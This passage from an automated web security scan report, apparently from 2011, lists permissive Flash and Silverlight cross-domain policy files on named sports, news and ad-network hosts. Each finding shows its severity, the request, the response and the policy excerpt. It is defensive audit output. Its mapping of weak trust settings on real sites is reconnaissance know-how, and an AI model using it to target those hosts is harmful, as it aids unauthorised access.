Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.manutd.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 05 Nov 2010 15:28:55 GMT
Accept-Ranges: bytes
ETag: "eea78028fe7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
svr: web4
Content-Length: 660
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="cloud.manutd.com" />
<allow-access-from domain="origin-cloud.manutd.com" />
<allow-access-from domain="web1.manutd.com" />
<allow-access-from domain="web2.manutd.com" />
<allow-access-from domain="web3.manutd.com" />
<allow-access-from domain="web4.manutd.com" />
<allow-access-from domain="web5.manutd.com" />
<allow-access-from domain="web6.manutd.com" />
<allow-access-from domain="web7.manutd.com" />
<allow-access-from domain="web8.manutd.com" />
<allow-access-from domain="www.cloud.manutd.com" />
...[SNIP]...

5.54. http://www.premierleague.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.premierleague.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.premierleague.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:44:14 GMT
Content-Type: text/xml
Expires: Sun, 02 Oct 2011 23:48:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:48:52 GMT
Content-Length: 322
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.55. http://www9.effectivemeasure.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www9.effectivemeasure.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Content-Type: text/xml
Accept-Ranges: bytes
Last-Modified: Fri, 11 Mar 2011 04:05:00 GMT
Content-Length: 322
Connection: close
Date: Sun, 02 Oct 2011 23:52:46 GMT
Server: C20

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.56. http://xml.eplayer.performgroup.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://xml.eplayer.performgroup.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: xml.eplayer.performgroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:33 GMT
ETag: W/"344-1310422012000"
Last-Modified: Mon, 11 Jul 2011 22:06:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 344
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

5.57. http://xml.premierleague.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://xml.premierleague.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xml.premierleague.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Last-Modified: Sun, 02 Oct 2011 23:48:22 GMT
Content-Type: text/xml
Expires: Sun, 02 Oct 2011 23:49:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:08 GMT
Content-Length: 322
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.58. http://adadvisor.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:19 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 539
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...
<allow-access-from domain="*.saymedia.com" />
...[SNIP]...

5.59. http://cookex.amp.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

5.60. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 15 Sep 2011 22:33:08 GMT
Date: Sun, 02 Oct 2011 06:13:55 GMT
Expires: Mon, 03 Oct 2011 06:13:55 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 63427
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.61. http://optimized-by.rubiconproject.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

5.62. http://resource.guim.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://resource.guim.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: resource.guim.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
X-GU-jas: 57-22127
X-GU-PageRenderer: RawResourcePageRenderer
Content-Language: en-US
Content-Type: application/xml
Content-Length: 695
X-GU-httpd: 57
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Cache-Control: max-age=8
Date: Sun, 02 Oct 2011 23:50:57 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- why are we doing this? See here: ht
...[SNIP]...
<allow-access-from domain="*.guardian.co.uk"/>
<allow-access-from domain="static.guim.co.uk"/>
<allow-access-from domain="static.guimqa.co.uk"/>
<allow-access-from domain="static.guimcode.co.uk"/>
<allow-access-from domain="*.gnl" />
...[SNIP]...

5.63. http://www.goal.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.goal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goal.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:59 GMT
Last-Modified: Thu, 17 Dec 2009 17:49:14 GMT
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 410
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="celebrations.coca-cola.com" />
<allow-access-from domain="*.celebrations.coca-cola.com" />
<allow-access-from domain="*.fifawc.coke.sapientem.com" />
<allow-access-from domain="*.goal.com" />
<allow-access-from domain="*.partofthegame.tv" />
   <allow-access-from domain="*.partofthegame.demo" />
...[SNIP]...

5.64. http://www.guardian.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:55 GMT
Server: Apache
Last-Modified: Thu, 01 Apr 2010 16:14:59 GMT
Accept-Ranges: bytes
Content-Length: 1353
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=86400
Expires: Mon, 03 Oct 2011 23:50:55 GMT
X-GU-httpd: 58
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- why are we doing this? See here: ht
...[SNIP]...
<allow-access-from domain="*.bs.preview.serving-sys.com"/>
<allow-access-from domain="199.106.209.225"/>
<allow-access-from domain="*.ds.serving-sys.com"/>
<allow-access-from domain="199.106.209.197"/>
<allow-access-from domain="*.bs.serving-sys.com"/>
<allow-access-from domain="80.252.91.41"/>
<allow-access-from domain="*.eyeblasterwiz.com"/>
<allow-access-from domain="199.106.209.196"/>
<allow-access-from domain="*.ebsearch.eyeblasterwiz.com"/>
<allow-access-from domain="62.249.238.93"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="web2.dreamleague.co.uk"/>
<allow-access-from domain="fantasyfootball.guardian.co.uk"/>
<allow-access-from domain="*.jumpmediagroup.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="adimage.guardian.co.uk"/>
<allow-access-from domain="static.guim.co.uk"/>
<allow-access-from domain="*.gnl" />
...[SNIP]...

5.65. http://matcher-cwb.bidder7.mookie1.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-cwb.bidder7.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 27 Aug 2011 03:06:07 GMT
ETag: "4010201-116-4ab73f16ec5c0"
Accept-Ranges: bytes
Content-Length: 278
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">

...[SNIP]...
<allow-access-from domain="zaptrader.themig.com" />
...[SNIP]...

6. Silverlight cross-domain policy
There are 16 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Sun, 02 Oct 2011 23:51:36 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.2. http://ad4.liverail.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad4.liverail.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:35 GMT
ETag: "1435256270"
Last-Modified: Mon, 26 Sep 2011 21:54:57 GMT
Server: lighttpd/1.4.29-devel-4:6M
Content-Length: 321
Connection: Close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>

...[SNIP]...

6.3. http://ads.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:16e0"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 02 Oct 2011 23:49:38 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

6.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 03 Oct 2011 23:50:07 GMT
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.5. http://beacon.securestudies.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 03 Oct 2011 23:52:41 GMT
Date: Sun, 02 Oct 2011 23:52:41 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

6.6. http://dev.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

6.7. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1502958
Date: Mon, 03 Oct 2011 01:02:37 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 15:33:18 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.8. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1507571
Date: Mon, 03 Oct 2011 01:02:34 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 14:16:23 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.9. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1506862
Date: Mon, 03 Oct 2011 01:02:37 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
